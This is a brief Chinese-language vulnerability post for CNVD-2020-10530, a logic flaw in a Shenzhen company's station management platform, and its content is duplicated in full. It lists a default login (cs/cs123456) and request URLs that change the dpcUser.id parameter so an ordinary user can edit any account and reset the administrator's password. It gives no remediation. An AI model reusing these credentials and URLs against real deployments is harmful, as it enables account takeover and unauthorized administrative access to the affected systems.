CNVD-2020-10530_深圳市科皓信息技術有限公司_測站綜合管理平台

# CNVD-2020-10530 深圳市科皓信息技術有限公司測站綜合管理平台邏輯缺陷漏洞

==前提條件==
該漏洞需要普通用戶身份登錄平台，登錄平台後可以以普通用戶的權限重置所有用戶（包括管理員）的密碼。

https:///dpc/

==默認用戶信息==

cs
cs123456

==重置Admin密碼==

https:///dpc/dpcUser!preEdit.action?dpcUser.id=1

修改dpcUser.id參數的值可以編輯任意用戶，其中可以對任意用戶進行重置密碼，如：

https:///dpc/dpcUser!preEdit.action?dpcUser.id=2

https:///dpc/dpcUser!preEdit.action?dpcUser.id=3

==前提條件==

該漏洞需要普通用戶身份登錄平台，登錄平台後可以以普通用戶的權限重置所有用戶（包括管理員）的密碼。

https:///dpc/

==默認用戶信息==

cs
cs123456

==重置Admin密碼==

https:///dpc/dpcUser!preEdit.action?dpcUser.id=1

修改dpcUser.id參數的值可以編輯任意用戶，其中可以對任意用戶進行重置密碼，如：

https:///dpc/dpcUser!preEdit.action?dpcUser.id=2

https:///dpc/dpcUser!preEdit.action?dpcUser.id=3

文章版权归作者所有，未经允许请勿转载。

THE END

CNVD-2020-10530_深圳市科皓信息技術有限公司_測站綜合管理平台_邏輯缺陷漏洞